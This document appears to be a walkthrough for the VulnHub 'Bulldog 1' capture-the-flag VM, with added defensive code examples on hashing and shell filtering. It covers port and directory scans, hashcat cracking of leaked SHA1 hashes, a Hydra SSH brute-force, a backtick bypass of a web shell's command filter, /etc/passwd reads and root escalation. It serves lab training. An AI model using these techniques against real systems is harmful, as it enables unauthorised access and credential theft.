VulnHub – Bulldog 1

This is the walk-through solution for the Capture the Flag (CTF) challenge called “Bulldog 1” from VulnHub.

Note: Please keep in mind that there are often many ways to successfully complete such a challenge. This is only one of them. Other tools can be used to obtain the same result.

This CTF was done using VirtualBox, and the target's IP address was 10.0.2.15.

CTF Introduction

Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out? :)

This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!

Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint ;)

Made by Nick Frichette (frichetten.com) Twitter: @frichette_n

I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.

Scan with nmap

nmap -T4 -A -v 10.0.2.15

Output:
...
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
...
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
...
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)

The output shows that the ssh service is open on port 23 (not the standard 22). It also shows that a web server is running on ports 80 and 8080.

Using the nmap ssh or http scripts didn’t help.
nmap -sV -p 23 --script="ssh*" 10.0.2.15

# http scripts took too long... 2 or 3 hours
nmap -sV -p 80 --script="http*" 10.0.2.15
nmap -sV -p 8080 --script="http*" 10.0.2.15

Access the website on port 80 or 8080

In a web browser, type 10.0.2.15:80 and 10.0.2.15:8080 in the URL address bar. Both sites look the same.

Scan website for hidden pages with gobuster

URL=10.0.2.15
WL=/usr/share/dirb/wordlists/common.txt
gobuster -u $URL -w $WL -s '200,204,301,302,307,403,500' -e

Output:
...
http://10.0.2.15/admin (Status: 301)
http://10.0.2.15/dev (Status: 301)
http://10.0.2.15/robots.txt (Status: 200)
...

By visiting the hidden web pages found with gobuster, we learn that there is a Django admin panel on /admin. We also find password hashes hidden in the source code of web page /dev:
<!--Need these password hashes for testing. Django's default is too complex-->
<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
Team Lead: alan@bulldogindustries.com<br>
<!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
Back-up Team Lead: william@bulldogindustries.com<br><br>
<!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
Front End: malik@bulldogindustries.com<br>
<!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
Front End: kevin@bulldogindustries.com<br><br>
<!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
Back End: ashley@bulldogindustries.com<br>
<!--553d917a396414ab99785694afd51df3a8a8a3e0-->
Back End: nick@bulldogindustries.com<br><br>
<!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
Database: sarah@bulldogindustries.com<br>
<!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->

Content of /robots.txt (converted from ASCII art):
German Shepherd Hack Team
You got owned

The /dev page also contains a link to a web shell at http://10.0.2.15/dev/shell/. The shell requires authentication:
Please authenticate with the server to use Web-Shell

Crack password hashes with Hashcat and “rockyou.txt” word list

Put the hashes in a text file. The hash type is SHA1 (a common choice; MD5 could have been tried too).
HASH=/root/Documents/hash/hash.txt
WL=/usr/share/wordlists/rockyou.txt

hashcat -m 100 $HASH $WL --force
hashcat -m 100 $HASH --show

We find:

  • User: sarah, Password: bulldoglover
  • User: nick, Password: bulldog
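
The developer comment on /dev assumes a leaked hash is harmless. As an added example (not code from the VM or from Django itself), the sketch below contrasts the unsalted SHA1 digest published on the page with a salted PBKDF2 string in Django's `algorithm$iterations$salt$hash` layout; the helper names and the iteration count are assumptions.

```python
import base64
import hashlib
import hmac
import os

# Nick's digest exactly as it appears in the /dev page source.
NICK_DIGEST = "ddf45997a7e18a25ad5f5cf222da64814dd060d5"


def unsalted_sha1(password: str) -> str:
    """What the /dev page leaked: one fixed digest per password, for every user."""
    return hashlib.sha1(password.encode()).hexdigest()


def pbkdf2_encode(password: str, salt: str = "", iterations: int = 260_000) -> str:
    """Build a Django-style encoded hash with a per-user random salt.
    The iteration count is an assumption; Django raises it between releases."""
    salt = salt or base64.b64encode(os.urandom(12)).decode()
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(dk).decode()}"


def pbkdf2_verify(password: str, encoded: str) -> bool:
    """Recompute with the stored salt and iterations, compare in constant time."""
    _, iterations, salt, _ = encoded.split("$")
    candidate = pbkdf2_encode(password, salt, int(iterations))
    return hmac.compare_digest(candidate, encoded)


if __name__ == "__main__":
    # Unsalted: the digest of a dictionary word is the same everywhere,
    # so a single pass over a word list tests every leaked account at once.
    print(unsalted_sha1("bulldog") == NICK_DIGEST)
    # Salted and iterated: two encodings of the same password differ,
    # and each guess costs `iterations` HMAC rounds per account.
    first, second = pbkdf2_encode("bulldog"), pbkdf2_encode("bulldog")
    print(first != second, pbkdf2_verify("bulldog", first))
```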

Log in with these credentials at http://10.0.2.15/admin, then go to http://10.0.2.15/dev/shell/.

Log in to the Django admin panel

Go to the Django admin panel at http://10.0.2.15/admin and enter Sarah or Nick’s user credentials.

Access the Web-Shell

Now that we are authenticated with Django, go to the web-shell at http://10.0.2.15/dev/shell/.

Trying any command that is not in the list displayed, we get the error message below.

INVALID COMMAND. I CAUGHT YOU HACKER!
or
INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!

After many tries, here is the interesting information I could get.

List of users

cat /etc/passwd

# Only these users can log in:
root
sync
bulldogadmin
django

Note: Trying to brute-force the passwords of the users that can log in, using Hydra, didn’t work.
USERS=/root/Documents/users.txt
IP="10.0.2.15:23"
WL=/usr/share/wordlists/rockyou.txt

hydra -t 10 -V -f -L $USERS -P $WL ssh://$IP

Display the current user (bypass command limitation using ` character)

echo `whoami`

Output:
django
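
Why the backtick works, and how the filter should have been built, shown as an added example rather than the VM's actual code. The naive filter is an assumed reconstruction (first word checked against an allowlist, ';' blocked, string passed to a shell); the allowlist holds only the three commands this walkthrough runs through the web shell, and the probe is a harmless constructed stand-in for the command above.

```python
import shlex
import subprocess

# Assumed allowlist: the commands this walkthrough runs through the web shell.
ALLOWED = {"cat", "echo", "ls"}
REJECT = "INVALID COMMAND. I CAUGHT YOU HACKER!"


def naive_shell(command: str) -> str:
    """Hypothetical filter of the kind bypassed above: it checks the first
    word and ';' only, then lets /bin/sh interpret the whole string."""
    words = command.split()
    if not words or words[0] not in ALLOWED or ";" in command:
        return REJECT
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.strip()


def hardened_shell(command: str) -> str:
    """Same allowlist, but no shell ever sees the input."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return REJECT
    if not argv or argv[0] not in ALLOWED:
        return REJECT
    # Characters that only mean something to a shell are refused outright.
    if any(ch in command for ch in "`$;|&<>(){}\n"):
        return REJECT
    # argv list + shell=False: arguments reach the program as literal text.
    done = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return done.stdout.strip()


# Constructed input: the inner command only prints a marker word.
PROBE = "echo `printf substituted`"

if __name__ == "__main__":
    print("naive   :", naive_shell(PROBE))        # inner command was executed
    print("hardened:", hardened_shell(PROBE))     # rejected before execution
    print("hardened:", hardened_shell("echo hello"))
```

Even the hardened form still lets the web user read any file it can access through cat and ls, which is how the note and the binary are found below; restricting paths is a separate control.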

Browse the home directories of the users previously found (including hidden files)

ls -la /home/bulldogadmin

Output:
...
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 00:44 .hiddenadmindirectory
...

Explore content of hidden directory

ls -la /home/bulldogadmin/.hiddenadmindirectory

Output:
..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 03:18 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin  619 Sep 21 00:44 note
..

Read the hidden note

cat /home/bulldogadmin/.hiddenadmindirectory/note

Output:
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app,give your account password, and it will determine if you should have access to that file or not!

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

Display content of customPermissionApp (cat command gives an error because it’s a binary file)

strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp

Output (only the interesting part):
...
SUPERultH
imatePASH
SWORDyouH
CANTget
...

Dropping the trailing “H” from the first three lines and joining the fragments gives the password “SUPERultimatePASSWORDyouCANTget”.
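
The 8-character fragments with a trailing "H" are typical of a string that the compiler loads with 8-byte immediate moves on x86-64: the next instruction starts with byte 0x48, which is ASCII "H". The added example below (not part of the VM; the sample bytes and the placeholder secret are constructed, and that customPermissionApp is built this way is an assumption) reproduces the artefact and reassembles the fragments shown above.

```python
import re

# The four fragments exactly as they appear in the strings output above.
PAGE_FRAGMENTS = ["SUPERultH", "imatePASH", "SWORDyouH", "CANTget"]


def build_sample(secret: bytes) -> bytes:
    """Constructed machine-code stand-in: for each 8-byte chunk emit
    movabs rax, imm64 (48 B8 + 8 bytes), then mov [rbp+disp8], rax (48 89 45 + disp)."""
    padded = secret.ljust(-(-len(secret) // 8) * 8, b"\x00")
    out = b""
    for i in range(0, len(padded), 8):
        disp = bytes([0x80 + i % 0x80])  # non-printable displacement byte
        out += b"\x48\xb8" + padded[i:i + 8] + b"\x48\x89\x45" + disp
    return out


def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Minimal equivalent of `strings`: runs of printable ASCII of min_len or more."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def join_fragments(fragments: list) -> str:
    """Heuristic: a 9-character fragment ending in 'H' is a full 8-byte chunk
    followed by the 0x48 prefix byte of the next instruction; drop that byte."""
    return "".join(f[:8] if len(f) == 9 and f.endswith("H") else f
                   for f in fragments)


if __name__ == "__main__":
    sample = build_sample(b"EXAMPLEplaceholderSECRETvalue42")
    found = ascii_strings(sample)
    print(found)                       # same shape as the output above
    print(join_fragments(found))       # placeholder secret recovered
    print(join_fragments(PAGE_FRAGMENTS))
```

Splitting a secret across instructions does not hide it; anything a binary needs at run time is readable by whoever can read the file.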

Copy customPermissionApp into django's home directory, since django cannot execute it while it is in bulldogadmin's directory (bypass the command limitation using the ` character)

echo `cp /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp /home/django/`

Connect to the server over ssh as the django user

ssh django@10.0.2.15 -p 23
Enter password: SUPERultimatePASSWORDyouCANTget

Elevate django privileges to root with customPermissionApp

# Grant execute on customPermissionApp to its owner (django)
chmod u+x /home/django/customPermissionApp

/home/django/customPermissionApp
Enter password: SUPERultimatePASSWORDyouCANTget

You are root!!!

Congrats message

cd /root
cat congrats.txt

Output:
Congratulations on completing this VM :D That wasn't so bad was it?

Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!

Note: While exploring as root, you will find a hidden antivirus directory that might be exploitable.

cd /
ls -la
drwxr-xr-x   2 root root  4096 Aug 25 22:09 .hiddenAVDirectory
cd .hiddenAVDirectory/
cat AVApplication.py

Output:
#!/usr/bin/env python
# Just wanted to throw this placeholder here really quick.
# We will put the full AV here when the vendor is done making it.
# - Alan